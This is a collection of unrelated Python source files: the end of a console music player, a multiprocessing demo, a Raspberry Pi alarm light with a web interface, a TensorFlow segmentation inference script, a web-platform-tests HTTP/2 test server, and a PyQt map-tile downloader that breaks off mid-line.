#creator with rainbow colors display if (is_pause): print(' ► {1} {2} {0} ◄) {3} {5} {4}'.format(music_length,datetime.timedelta(seconds=int(mixer.music.get_pos()/1000)), progressBar(int(mixer.music.get_pos()/1000), music_length_seconds,46), progressBar(int(volume_level*100), 100,10),get_loop_forever(),get_randomize_music()).center(int(console_x))) #if paused is true controller else: print('▐▐ {1} {2} {0} ◄) {3} {5} {4}'.format(music_length,datetime.timedelta(seconds=int(mixer.music.get_pos()/1000)), progressBar(int(mixer.music.get_pos()/1000), music_length_seconds,46), progressBar(int(volume_level*100), 100,10),get_loop_forever(),get_randomize_music()).center(int(console_x))) #if not paused controller #command line interface def cli(): while notExit: cli_refresh() time.sleep(1) #console_window console_x, console_y = terminal_size() #resize and get height and length os.system("title Geet -cli") #change title just incase main() #welcome Screen cli_thread = threading.Thread(target=cli) #intiating parellel processing in gui cli_thread.start() #gui start initiate_keyborde_logic() #adding keypress logics cli_thread.join() #when pressed ends program
multi_processing.py
#!/usr/bin/env python3 # FileName:multi_processing.py # -*- coding: utf-8 -*- """ multiprocessing 实现多进程""" from multiprocessing import Process import os # 子进程运行的代码 def run_proc(name): print('Run child process %s(%s)' % (name, os.getpid())) if __name__ == '__main__': print('Parent process %s' % os.getpid()) p = Process(target=run_proc, args=('test',)) print('child process will start...') p.start() p.join() print('Child process end')
d.light.py
#!/usr/bin/python import config from multiprocessing import Process, Manager, Event def scheduler(dummy,state,esnooze): import time from datetime import datetime, timedelta while True: now = datetime.now() at = datetime.strptime(state['alarmtime'],'%H:%M')-timedelta(minutes=state['brightentime']) if at.hour == now.hour and at.minute == now.minute and now.second <= 2 and state['alarmset']: state['alarming'] = True i = int(config.dimlow) while state['alarming'] and state['alarmset']: if esnooze.is_set(): i=int(config.dimlow) esnooze.clear() if state['alarming']: state['dim'] = 0 state['on'] = False esnooze.wait(state['snoozetime']*60) if state['alarming'] == False: esnooze.clear() break state['dim'] = (float(i)-config.dimlow)/config.dimrange*100 state['on'] = True esnooze.wait(state['brightentime']*60./float(config.dimrange)) if i < config.dimhigh: i=i+1 time.sleep(1) def light(dummy,state): import RPi.GPIO as GPIO import time p1 = config.p1 p2 = config.p2 p4 = config.p4 p8 = config.p8 p16 = config.p16 p32 = config.p32 p64 = config.p64 p128 = config.p128 GPIO.setmode(GPIO.BCM) GPIO.setwarnings(False) GPIO.setup(p1,GPIO.OUT) GPIO.setup(p2,GPIO.OUT) GPIO.setup(p4,GPIO.OUT) GPIO.setup(p8,GPIO.OUT) GPIO.setup(p16,GPIO.OUT) GPIO.setup(p32,GPIO.OUT) GPIO.setup(p64,GPIO.OUT) GPIO.setup(p128,GPIO.OUT) try: while True: if state['on'] == True: if state['dim'] == 0: dim = 0 state['on'] = False elif state['dim'] == 100: dim = 255 else: dim = int(state['dim']/100.*config.dimrange+config.dimlow) GPIO.output(p1,not dim&1) GPIO.output(p2,not dim&2) GPIO.output(p4,not dim&4) GPIO.output(p8,not dim&8) GPIO.output(p16,not dim&16) GPIO.output(p32,not dim&32) GPIO.output(p64,not dim&64) GPIO.output(p128,not dim&128) else: GPIO.output(p1,True) GPIO.output(p2,True) GPIO.output(p4,True) GPIO.output(p8,True) GPIO.output(p16,True) GPIO.output(p32,True) GPIO.output(p64,True) GPIO.output(p128,True) sleep(.1) except: GPIO.cleanup() finally: GPIO.cleanup() def web(dummy,state,esnooze): from bottle import route, run, get, post, request, static_file, abort import time import os from datetime import datetime wwwroot = os.path.dirname(__file__)+'/www' @route('/') def docroot(): return static_file('index.html',wwwroot) @route('/light/<sw>') def light(sw): if sw == "on": state['dim'] = 100. state['on'] = True return dict(state) elif sw == "off": state['alarming'] = False state['dim'] = 0. state['on'] = False return dict(state) else: return false @route('/alarm/<sw>') def alarm(sw): if sw == 'on': state['alarmset'] = True return dict(state) elif sw == 'off': if state['alarming']: state['alarming'] = False state['dim'] = 0 esnooze.set() state['alarmset'] = False return dict(state) else: abort(400,'Invalid alarm setting.') @route('/alarmset/<t>') def alarmset(t): try: datetime.strptime(t,'%H:%M') except: abort(400,'Invalid time format.') state['alarmtime'] = t return dict(state) @route('/snoozeset/<t:int>') def snoozeset(t): state['snoozetime'] = float(t) return dict(state) @route('/brightenset/<t:int>') def brightenset(t): state['brightentime'] = float(t) return dict(state) @route('/dim/<dimval:int>') def dim(dimval): state['on'] = True state['dim'] = float(dimval) return dict(state) @route('/snooze') def snooze(): esnooze.set() return dict(state) @route('/alarmoff') def alarmoff(): state['alarming'] = False esnooze.set() state['dim'] = 100 state['on'] = True return dict(state) @route('/stat') def stat(): return dict(state) @route('/<filepath:path>') def servfile(filepath): return static_file(filepath,wwwroot) run(host='0.0.0.0',port=config.wwwport) if __name__ == '__main__': from time import sleep manager = Manager() state = manager.dict() state['on'] = False state['dim'] = 0. state['snoozetime'] = config.snoozetime state['brightentime'] = config.brightentime state['alarmset'] = True state['alarmtime'] = config.alarmtime state['alarming'] = False esnooze = Event() l = Process(target=light,args=(1,state)) l.daemon = True l.start() w = Process(target=web,args=(1,state,esnooze)) w.daemon = True w.start() s = Process(target=scheduler,args=(1,state,esnooze)) s.daemon = True s.start() while l.is_alive() and w.is_alive() and s.is_alive(): sleep(1)
inference.py
""" Run inference over a test split """ import argparse import json import logging import logging.config import multiprocessing import os import sys import tensorflow as tf import matplotlib.pyplot as plt import models import datasets import tensortools as tt def decode_tfrecord(example, image_size): """ Decoding clojure passed to the input pipeline. :param example: TFRecord example see dataset module for format details :returns: decoded image """ image = tf.image.decode_image(example["image/data"], dtype=tf.float32, name="DecodeImage") image.set_shape(image_size) file_id = example["id"] return image, file_id class PlotThread(object): def __init__(self, filepaths): self.idx = 0 self.fig = plt.figure() self.ax = self.fig.gca() self.img = None self.filepaths = filepaths def keyboard_callback(self, event): if event.key == "left": self.idx = (self.idx - 1) % len(self.filepaths) elif event.key == "right": self.idx = (self.idx + 1) % len(self.filepaths) self.img = plt.imread(self.filepaths[self.idx]) self.ax.imshow(self.img) self.ax.set_xlabel(os.path.basename(self.filepaths[self.idx])) self.fig.canvas.draw() def __call__(self): # Wait for first image to be processed while len(self.filepaths) == 0: continue self.fig.canvas.mpl_connect("key_press_event", self.keyboard_callback) self.img = plt.imread(self.filepaths[self.idx]) self.ax.imshow(self.img) self.ax.set_xlabel(os.path.basename(self.filepaths[self.idx])) plt.show() def main(args): dataset = None # Retrieve datset if args.dataset == "cityscapes": dataset = datasets.Cityscapes() elif args.dataset == "freiburg": dataset = datasets.Freiburg() else: raise NotImplementedError("Dataset \"%s\" not yet supported." % args.dataset) # Configure directories data_dir = dataset.get_test_paths(args.data_dir)[0] if not os.path.exists(args.output): os.makedirs(args.output) # Parse first record and retrieve image dimensions first_record = os.path.join(data_dir, os.listdir(data_dir)[0]) example = tt.tfrecord.tfrecord2example_dict(first_record) example = example["features"]["feature"] height = example["height"]["int64List"]["value"][0] width = example["width"]["int64List"]["value"][0] channels = example["image/channels"]["int64List"]["value"][0] decode_fn = lambda example: decode_tfrecord(example, [height, width, channels]) # Create network and input stage net = models.ENet(dataset.num_classes) input_stage = tt.input.InputStage(input_shape=[height, width, channels]) # Add test set to input stage num_examples = input_stage.add_dataset("test", data_dir, batch_size=1, decode_fn=decode_fn) input_image, file_id = input_stage.get_output() input_image = tf.expand_dims(input_image, axis=0) logits = net(input_image, training=False) p_class = tf.nn.softmax(logits) if args.size is not None: p_class = tf.image.resize_bilinear(logits, args.size) pred = tf.math.argmax(p_class, axis=-1) # Do the reverse embedding from trainId to dataset id if not args.color: pred = tf.expand_dims(pred, axis=-1) embedding = tf.constant(dataset.embedding_reversed, dtype=tf.uint8) pred_embed = tf.gather_nd(embedding, pred) # Expand lost dimension pred_embed = tf.expand_dims(pred_embed, axis=-1) else: pred_embed = tf.gather(dataset.colormap, tf.cast(pred, tf.int32)) pred_embed = tf.cast(pred_embed, tf.uint8) # Encode output image pred_encoding = tf.image.encode_png(pred_embed[0]) # Write encoded file to @args.output_dir output_dir = args.output if output_dir[-1] == "/": output_dir = output_dir[:-1] filename = tf.string_join([file_id, ".png"]) filepath = tf.string_join([output_dir, filename], separator="/") write_file = tf.io.write_file(filepath, pred_encoding) print("Loading checkpoint") # Restore model from checkpoint (@args.ckpt) ckpt = tf.train.Checkpoint(model=net) status = ckpt.restore(args.ckpt) print("Checkpoint loaded") if tf.__version__ < "1.14.0": status.assert_existing_objects_matched() else: status.expect_partial() # Create session and restore model sess = tf.Session() status.initialize_or_restore(sess) # Initialize input stage input_stage.init_iterator("test", sess) # Create visualization thread manager = multiprocessing.Manager() filepaths = manager.list() pt = PlotThread(filepaths) p = multiprocessing.Process(target=pt) p.start() # Loop over all images while True: try: _, _file_id, path = sess.run((write_file, file_id, filepath)) filepaths.append(path.decode("ascii")) logger.info("Written processed sample %s" % str(_file_id)) except tf.errors.OutOfRangeError: break logger.info("Inference successfully finished.") p.join() return 0 if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-c", "--checkpoint", type=str, dest="ckpt", required=True, help="Path to checkpoint file." ) parser.add_argument("-d", "--data-dir", type=str, dest="data_dir", required=True, help="Path to dataset test set directory." ) parser.add_argument("-o", "--output", type=str, dest="output", required=True, help="Output directory to store prediction map images." ) parser.add_argument("-t", "--dataset", type=str, dest="dataset", required=True, help="Dataset type: {cityscapes, freiburg}." ) parser.add_argument("-s", "--output-size", type=int, nargs=2, dest="size", required=False, default=None, help="Size of the output images." ) parser.add_argument("--color", action="store_true", required=False, default=False, dest="color") args = parser.parse_args() logger = logging.getLogger(__name__) with open("util/logging.json") as conf: conf_dict = json.load(conf) logging.config.dictConfig(conf_dict) del conf_dict sys.exit(main(args))
server.py
from six.moves import BaseHTTPServer import errno import os import socket from six.moves.socketserver import ThreadingMixIn import ssl import sys import threading import time import traceback from six import binary_type, text_type import uuid from collections import OrderedDict from six.moves.queue import Queue from h2.config import H2Configuration from h2.connection import H2Connection from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded from six.moves.urllib.parse import urlsplit, urlunsplit from . import routes as default_routes from .config import ConfigBuilder from .logger import get_logger from .request import Server, Request, H2Request from .response import Response, H2Response from .router import Router from .utils import HTTPException from .constants import h2_headers # We need to stress test that browsers can send/receive many headers (there is # no specified limit), but the Python stdlib has an arbitrary limit of 100 # headers. Hitting the limit would produce an exception that is silently caught # in Python 2 but leads to HTTP 431 in Python 3, so we monkey patch it higher. # https://bugs.python.org/issue26586 # https://github.com/web-platform-tests/wpt/pull/24451 from six.moves import http_client assert isinstance(getattr(http_client, '_MAXHEADERS'), int) setattr(http_client, '_MAXHEADERS', 512) """ HTTP server designed for testing purposes. The server is designed to provide flexibility in the way that requests are handled, and to provide control both of exactly what bytes are put on the wire for the response, and in the timing of sending those bytes. The server is based on the stdlib HTTPServer, but with some notable differences in the way that requests are processed. Overall processing is handled by a WebTestRequestHandler, which is a subclass of BaseHTTPRequestHandler. This is responsible for parsing the incoming request. A RequestRewriter is then applied and may change the request data if it matches a supplied rule. Once the request data had been finalised, Request and Response objects are constructed. These are used by the other parts of the system to read information about the request and manipulate the response. Each request is handled by a particular handler function. The mapping between Request and the appropriate handler is determined by a Router. By default handlers are installed to interpret files under the document root with .py extensions as executable python files (see handlers.py for the api for such files), .asis files as bytestreams to be sent literally and all other files to be served statically. The handler functions are responsible for either populating the fields of the response object, which will then be written when the handler returns, or for directly writing to the output stream. """ class RequestRewriter(object): def __init__(self, rules): """Object for rewriting the request path. :param rules: Initial rules to add; a list of three item tuples (method, input_path, output_path), defined as for register() """ self.rules = {} for rule in reversed(rules): self.register(*rule) self.logger = get_logger() def register(self, methods, input_path, output_path): """Register a rewrite rule. :param methods: Set of methods this should match. "*" is a special value indicating that all methods should be matched. :param input_path: Path to match for the initial request. :param output_path: Path to replace the input path with in the request. """ if isinstance(methods, (binary_type, text_type)): methods = [methods] self.rules[input_path] = (methods, output_path) def rewrite(self, request_handler): """Rewrite the path in a BaseHTTPRequestHandler instance, if it matches a rule. :param request_handler: BaseHTTPRequestHandler for which to rewrite the request. """ split_url = urlsplit(request_handler.path) if split_url.path in self.rules: methods, destination = self.rules[split_url.path] if "*" in methods or request_handler.command in methods: self.logger.debug("Rewriting request path %s to %s" % (request_handler.path, destination)) new_url = list(split_url) new_url[2] = destination new_url = urlunsplit(new_url) request_handler.path = new_url class WebTestServer(ThreadingMixIn, BaseHTTPServer.HTTPServer): allow_reuse_address = True acceptable_errors = (errno.EPIPE, errno.ECONNABORTED) request_queue_size = 2000 # Ensure that we don't hang on shutdown waiting for requests daemon_threads = True def __init__(self, server_address, request_handler_cls, router, rewriter, bind_address, config=None, use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False, latency=None, http2=False, **kwargs): """Server for HTTP(s) Requests :param server_address: tuple of (server_name, port) :param request_handler_cls: BaseHTTPRequestHandler-like class to use for handling requests. :param router: Router instance to use for matching requests to handler functions :param rewriter: RequestRewriter-like instance to use for preprocessing requests before they are routed :param config: Dictionary holding environment configuration settings for handlers to read, or None to use the default values. :param use_ssl: Boolean indicating whether the server should use SSL :param key_file: Path to key file to use if SSL is enabled. :param certificate: Path to certificate to use if SSL is enabled. :param encrypt_after_connect: For each connection, don't start encryption until a CONNECT message has been received. This enables the server to act as a self-proxy. :param bind_address True to bind the server to both the IP address and port specified in the server_address parameter. False to bind the server only to the port in the server_address parameter, but not to the address. :param latency: Delay in ms to wait before serving each response, or callable that returns a delay in ms """ self.router = router self.rewriter = rewriter self.scheme = "http2" if http2 else "https" if use_ssl else "http" self.logger = get_logger() self.latency = latency if bind_address: hostname_port = server_address else: hostname_port = ("",server_address[1]) #super doesn't work here because BaseHTTPServer.HTTPServer is old-style BaseHTTPServer.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs) if config is not None: Server.config = config else: self.logger.debug("Using default configuration") with ConfigBuilder(browser_host=server_address[0], ports={"http": [self.server_address[1]]}) as config: assert config["ssl_config"] is None Server.config = config self.key_file = key_file self.certificate = certificate self.encrypt_after_connect = use_ssl and encrypt_after_connect if use_ssl and not encrypt_after_connect: if http2: ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH) ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate) ssl_context.set_alpn_protocols(['h2']) self.socket = ssl_context.wrap_socket(self.socket, server_side=True) else: self.socket = ssl.wrap_socket(self.socket, keyfile=self.key_file, certfile=self.certificate, server_side=True) def handle_error(self, request, client_address): error = sys.exc_info()[1] if ((isinstance(error, socket.error) and isinstance(error.args, tuple) and error.args[0] in self.acceptable_errors) or (isinstance(error, IOError) and error.errno in self.acceptable_errors)): pass # remote hang up before the result is sent else: self.logger.error(traceback.format_exc()) class BaseWebTestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): """RequestHandler for WebTestHttpd""" def __init__(self, *args, **kwargs): self.logger = get_logger() BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs) def finish_handling_h1(self, request_line_is_valid): self.server.rewriter.rewrite(self) request = Request(self) response = Response(self, request) if request.method == "CONNECT": self.handle_connect(response) return if not request_line_is_valid: response.set_error(414) response.write() return self.logger.debug("%s %s" % (request.method, request.request_path)) handler = self.server.router.get_handler(request) self.finish_handling(request, response, handler) def finish_handling(self, request, response, handler): # If the handler we used for the request had a non-default base path # set update the doc_root of the request to reflect this if hasattr(handler, "base_path") and handler.base_path: request.doc_root = handler.base_path if hasattr(handler, "url_base") and handler.url_base != "/": request.url_base = handler.url_base if self.server.latency is not None: if callable(self.server.latency): latency = self.server.latency() else: latency = self.server.latency self.logger.warning("Latency enabled. Sleeping %i ms" % latency) time.sleep(latency / 1000.) if handler is None: self.logger.debug("No Handler found!") response.set_error(404) else: try: handler(request, response) except HTTPException as e: response.set_error(e.code, e.message) except Exception as e: self.respond_with_error(response, e) self.logger.debug("%i %s %s (%s) %i" % (response.status[0], request.method, request.request_path, request.headers.get('Referer'), request.raw_input.length)) if not response.writer.content_written: response.write() # If a python handler has been used, the old ones won't send a END_STR data frame, so this # allows for backwards compatibility by accounting for these handlers that don't close streams if isinstance(response, H2Response) and not response.writer.stream_ended: response.writer.end_stream() # If we want to remove this in the future, a solution is needed for # scripts that produce a non-string iterable of content, since these # can't set a Content-Length header. A notable example of this kind of # problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1) if response.close_connection: self.close_connection = True if not self.close_connection: # Ensure that the whole request has been read from the socket request.raw_input.read() def handle_connect(self, response): self.logger.debug("Got CONNECT") response.status = 200 response.write() if self.server.encrypt_after_connect: self.logger.debug("Enabling SSL for connection") self.request = ssl.wrap_socket(self.connection, keyfile=self.server.key_file, certfile=self.server.certificate, server_side=True) self.setup() return def respond_with_error(self, response, e): message = str(e) if message: err = [message] else: err = [] err.append(traceback.format_exc()) response.set_error(500, "\n".join(err)) class Http2WebTestRequestHandler(BaseWebTestRequestHandler): protocol_version = "HTTP/2.0" def handle_one_request(self): """ This is the main HTTP/2.0 Handler. When a browser opens a connection to the server on the HTTP/2.0 port, the server enters this which will initiate the h2 connection and keep running throughout the duration of the interaction, and will read/write directly from the socket. Because there can be multiple H2 connections active at the same time, a UUID is created for each so that it is easier to tell them apart in the logs. """ config = H2Configuration(client_side=False) self.conn = H2ConnectionGuard(H2Connection(config=config)) self.close_connection = False # Generate a UUID to make it easier to distinguish different H2 connection debug messages self.uid = str(uuid.uuid4())[:8] self.logger.debug('(%s) Initiating h2 Connection' % self.uid) with self.conn as connection: connection.initiate_connection() data = connection.data_to_send() window_size = connection.remote_settings.initial_window_size self.request.sendall(data) # Dict of { stream_id: (thread, queue) } stream_queues = {} try: while not self.close_connection: data = self.request.recv(window_size) if data == '': self.logger.debug('(%s) Socket Closed' % self.uid) self.close_connection = True continue with self.conn as connection: frames = connection.receive_data(data) window_size = connection.remote_settings.initial_window_size self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames)) for frame in frames: if isinstance(frame, ConnectionTerminated): self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid) self.close_connection = True # Flood all the streams with connection terminated, this will cause them to stop for stream_id, (thread, queue) in stream_queues.items(): queue.put(frame) elif hasattr(frame, 'stream_id'): if frame.stream_id not in stream_queues: queue = Queue() stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue) stream_queues[frame.stream_id][1].put(frame) if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended): del stream_queues[frame.stream_id] except (socket.timeout, socket.error) as e: self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e))) if not self.close_connection: self.close_connection = True for stream_id, (thread, queue) in stream_queues.items(): queue.put(None) except Exception as e: self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e))) finally: for stream_id, (thread, queue) in stream_queues.items(): thread.join() def start_stream_thread(self, frame, queue): """ This starts a new thread to handle frames for a specific stream. :param frame: The first frame on the stream :param queue: A queue object that the thread will use to check for new frames :return: The thread object that has already been started """ t = threading.Thread( target=Http2WebTestRequestHandler._stream_thread, args=(self, frame.stream_id, queue) ) t.start() return t def _stream_thread(self, stream_id, queue): """ This thread processes frames for a specific stream. It waits for frames to be placed in the queue, and processes them. When it receives a request frame, it will start processing immediately, even if there are data frames to follow. One of the reasons for this is that it can detect invalid requests before needing to read the rest of the frames. """ # The file-like pipe object that will be used to share data to request object if data is received wfile = None request = None response = None req_handler = None while not self.close_connection: # Wait for next frame, blocking frame = queue.get(True, None) self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame))) if isinstance(frame, RequestReceived): rfile, wfile = os.pipe() rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb') stream_handler = H2HandlerCopy(self, frame, rfile) stream_handler.server.rewriter.rewrite(stream_handler) request = H2Request(stream_handler) response = H2Response(stream_handler, request) req_handler = stream_handler.server.router.get_handler(request) if hasattr(req_handler, "frame_handler"): # Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames req_handler = self.frame_handler(request, response, req_handler) if hasattr(req_handler, 'handle_headers'): req_handler.handle_headers(frame, request, response) elif isinstance(frame, DataReceived): wfile.write(frame.data) if hasattr(req_handler, 'handle_data'): req_handler.handle_data(frame, request, response) if frame.stream_ended: wfile.close() elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)): self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id)) break if request is not None: request.frames.append(frame) if hasattr(frame, "stream_ended") and frame.stream_ended: self.finish_handling(request, response, req_handler) def frame_handler(self, request, response, handler): try: return handler.frame_handler(request) except HTTPException as e: response.set_error(e.code, e.message) response.write() except Exception as e: self.respond_with_error(response, e) response.write() class H2ConnectionGuard(object): """H2Connection objects are not threadsafe, so this keeps thread safety""" lock = threading.Lock() def __init__(self, obj): assert isinstance(obj, H2Connection) self.obj = obj def __enter__(self): self.lock.acquire() return self.obj def __exit__(self, exception_type, exception_value, traceback): self.lock.release() class H2Headers(dict): def __init__(self, headers): self.raw_headers = OrderedDict() for key, val in headers: self.raw_headers[key] = val dict.__setitem__(self, self._convert_h2_header_to_h1(key), val) def _convert_h2_header_to_h1(self, header_key): if header_key[1:] in h2_headers and header_key[0] == ':': return header_key[1:] else: return header_key # TODO This does not seem relevant for H2 headers, so using a dummy function for now def getallmatchingheaders(self, header): return ['dummy function'] class H2HandlerCopy(object): def __init__(self, handler, req_frame, rfile): self.headers = H2Headers(req_frame.headers) self.command = self.headers['method'] self.path = self.headers['path'] self.h2_stream_id = req_frame.stream_id self.server = handler.server self.protocol_version = handler.protocol_version self.client_address = handler.client_address self.raw_requestline = '' self.rfile = rfile self.request = handler.request self.conn = handler.conn class Http1WebTestRequestHandler(BaseWebTestRequestHandler): protocol_version = "HTTP/1.1" def handle_one_request(self): response = None try: self.close_connection = False request_line_is_valid = self.get_request_line() if self.close_connection: return request_is_valid = self.parse_request() if not request_is_valid: #parse_request() actually sends its own error responses return self.finish_handling_h1(request_line_is_valid) except socket.timeout as e: self.log_error("Request timed out: %r", e) self.close_connection = True return except Exception: err = traceback.format_exc() if response: response.set_error(500, err) response.write() self.logger.error(err) def get_request_line(self): try: self.raw_requestline = self.rfile.readline(65537) except socket.error: self.close_connection = True return False if len(self.raw_requestline) > 65536: self.requestline = '' self.request_version = '' self.command = '' return False if not self.raw_requestline: self.close_connection = True return True class WebTestHttpd(object): """ :param host: Host from which to serve (default: 127.0.0.1) :param port: Port from which to serve (default: 8000) :param server_cls: Class to use for the server (default depends on ssl vs non-ssl) :param handler_cls: Class to use for the RequestHandler :param use_ssl: Use a SSL server if no explicit server_cls is supplied :param key_file: Path to key file to use if ssl is enabled :param certificate: Path to certificate file to use if ssl is enabled :param encrypt_after_connect: For each connection, don't start encryption until a CONNECT message has been received. This enables the server to act as a self-proxy. :param router_cls: Router class to use when matching URLs to handlers :param doc_root: Document root for serving files :param routes: List of routes with which to initialize the router :param rewriter_cls: Class to use for request rewriter :param rewrites: List of rewrites with which to initialize the rewriter_cls :param config: Dictionary holding environment configuration settings for handlers to read, or None to use the default values. :param bind_address: Boolean indicating whether to bind server to IP address. :param latency: Delay in ms to wait before serving each response, or callable that returns a delay in ms HTTP server designed for testing scenarios. Takes a router class which provides one method get_handler which takes a Request and returns a handler function. .. attribute:: host The host name or ip address of the server .. attribute:: port The port on which the server is running .. attribute:: router The Router object used to associate requests with resources for this server .. attribute:: rewriter The Rewriter object used for URL rewriting .. attribute:: use_ssl Boolean indicating whether the server is using ssl .. attribute:: started Boolean indicating whether the server is running """ def __init__(self, host="127.0.0.1", port=8000, server_cls=None, handler_cls=Http1WebTestRequestHandler, use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False, router_cls=Router, doc_root=os.curdir, routes=None, rewriter_cls=RequestRewriter, bind_address=True, rewrites=None, latency=None, config=None, http2=False): if routes is None: routes = default_routes.routes self.host = host self.router = router_cls(doc_root, routes) self.rewriter = rewriter_cls(rewrites if rewrites is not None else []) self.use_ssl = use_ssl self.http2 = http2 self.logger = get_logger() if server_cls is None: server_cls = WebTestServer if use_ssl: if not os.path.exists(key_file): raise ValueError("SSL certificate not found: {}".format(key_file)) if not os.path.exists(certificate): raise ValueError("SSL key not found: {}".format(certificate)) try: self.httpd = server_cls((host, port), handler_cls, self.router, self.rewriter, config=config, bind_address=bind_address, use_ssl=use_ssl, key_file=key_file, certificate=certificate, encrypt_after_connect=encrypt_after_connect, latency=latency, http2=http2) self.started = False _host, self.port = self.httpd.socket.getsockname() except Exception: self.logger.critical("Failed to start HTTP server on port %s; " "is something already using that port?" % port) raise def start(self, block=False): """Start the server. :param block: True to run the server on the current thread, blocking, False to run on a separate thread.""" http_type = "http2" if self.http2 else "https" if self.use_ssl else "http" self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port)) self.started = True if block: self.httpd.serve_forever() else: self.server_thread = threading.Thread(target=self.httpd.serve_forever) self.server_thread.setDaemon(True) # don't hang on exit self.server_thread.start() def stop(self): """ Stops the server. If the server is not running, this method has no effect. """ if self.started: try: self.httpd.shutdown() self.httpd.server_close() self.server_thread.join() self.server_thread = None self.logger.info("Stopped http server on %s:%s" % (self.host, self.port)) except AttributeError: pass self.started = False self.httpd = None def get_url(self, path="/", query=None, fragment=None): if not self.started: return None return urlunsplit(("http" if not self.use_ssl else "https", "%s:%s" % (self.host, self.port), path, query, fragment))
main.py
# Copyright (c) 2021 W-Mai # # This software is released under the MIT License. # https://opensource.org/licenses/MIT from contextlib import closing import requests from PyQt6.QtCore import * from PyQt6.QtWidgets import * from PyQt6.QtGui import * import PyQt6.sip import sys import os import json from typing import * import threading from time import sleep from random import random mutex = threading.Lock() mutex_ps = threading.Lock() def abstract_file_path(file): return file.lstrip('/') def check_file_valid(file): if not os.path.isfile(file): return False print(file) with open(file, 'rb') as f: mg = f.read(8) print(mg) return mg == b'{"URL":{' headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36' } timeout = 5 def download(img_url, img_name, out_dir): if os.path.isfile(os.path.join(out_dir, img_name)): return {'code': 1, 'msg': 'S:E'} with closing(requests.get(img_url, stream=True, headers=headers, timeout=timeout)) as r: rc = r.status_code if 299 < rc or rc < 200: return {'code': 1, 'msg': f'C:{rc}'} content_length = int(r.headers.get('content-length', '0')) if content_length == 0: return {'code': 1, 'msg': f'L:{0}'} try: if not os.path.exists(out_dir): os.makedirs(out_dir) with open(os.path.join(out_dir, img_name), 'wb') as f: for data in r.iter_content(1024): f.write(data) except Exception as e: print(e) return {'code': 1, 'msg': 'S:F'} return {'code': 0, 'msg': None} class EmptyDelegate(QItemDelegate): def __init__(self, parent): super(EmptyDelegate, self).__init__(parent) def createEditor(self, e1: QWidget, e2: QStyleOptionViewItem, e3: QModelIndex): return None class MainWindow(QWidget): psSig = pyqtSignal() def __init__(self): super().__init__() self.TotalItem = 0 self.CurrentFinished = 0 self.setAcceptDrops(True) self.CurrentFilePath = '' self.tmpFilePath = '' self.CurrentDir = '' self.rawData = {} # 设置初始大小与标题 # 垂直布局 layout = QVBoxLayout() listview = QTableView() listview.setMinimumHeight(300) listview.setModel(QStandardItemModel(0, 2)) listview.clicked.connect(self.clicked) listview.setItemDelegate(EmptyDelegate(self)) listview.setColumnWidth(0, 150) listview.setColumnWidth(1, 80) self.model: QStandardItemModel = listview.model() self.model.setHorizontalHeaderLabels(["KEY", "STATUS"]) psProcess = QProgressBar() psProcess.setAlignment(Qt.Alignment.AlignCenter) psProcess.setValue(0) self.psProcess = psProcess btDownload = QPushButton() btDownload.setMinimumHeight(30) btDownload.setText("START DOWNLOAD") btDownload.clicked.connect(self.clicked_bt_download) layout.addWidget(listview) layout.addWidget(psProcess) layout.addWidget(btDownload) self.list = listview self.setLayout(layout) self.setUi() def setUi(self): self.setFixedWidth(300) self.setWindowTitle('XLocate Downloader') self.show() def dragEnterEvent(self, e: QDragEnterEvent): data: QMimeData = e.mimeData() urls = data.urls() if len(urls) == 1: path = abstract_file_path(urls[0].path()) if check_file_valid(path): e.accept() self.tmpFilePath = path else: e.ignore() else: e.ignore() def dropEvent(self, e): self.CurrentFilePath = self.tmpFilePath # self.file_path = abstract_file_path(e.mimeData().urls()[0].path()) self.list_clear() filename = os.path.split(self.CurrentFilePath) filename = os.path.splitext(filename[-1])[0] self.CurrentDir = os.path.join(os.path.dirname(self.CurrentFilePath), filename) print(self.CurrentDir) with open(self.CurrentFilePath) as f: self.rawData = json.load(f) print(self.rawData['URL']) self.list_insert_data(self.rawData['CODES']) def clicked(self, qModelIndex): print(qModelIndex.row()) def clicked_bt_download(self, e): # url = "http://t0.tiles.ditu.live.com/tiles/r132122221.png?g=102&mkt=zh-cn&n=z" # print(download(url, 'test.png', r'C:\Users\W-Mai\Desktop\MAP')) if self.CurrentFilePath == "": return g = self.ItemGenerator() self.TotalItem = self.model.rowCount() self.CurrentFinished = 0 self.psSig.connect(self.ProcessRefresh) # threading.Thread(target=self.ProcessRefreshThread).start() for index in range(32): threading.Thread(target=self.DownloadTread, args=(g,), name=str(index)).start() def list_insert_data(self, data: Dict[AnyStr, List[AnyStr]]): model = self.model for key, val in data.items(): if int(key) < 10: continue model.appendRow(QStandardItem(f"{key}")) model.setItem(model.rowCount() - 1, 1, QStandardItem("...")) def list_clear(self): model = self.model model.removeRows(0, model.rowCount()) def ProcessRefresh(self): # with mutex_ps: # print(int(self.CurrentFinished / self.TotalItem * 100)) self.psProcess.setValue(int(self.CurrentFinished / self.TotalItem * 100)) def ItemGenerator(self): model: QStandardItemModel = self.model prefix = self.rawData["URL"]['prefix'] suffix = self.rawData["URL"]['suffix'] num = model.rowCount() yield_list = [] for index in range(num): key = model.data(model.index(index, 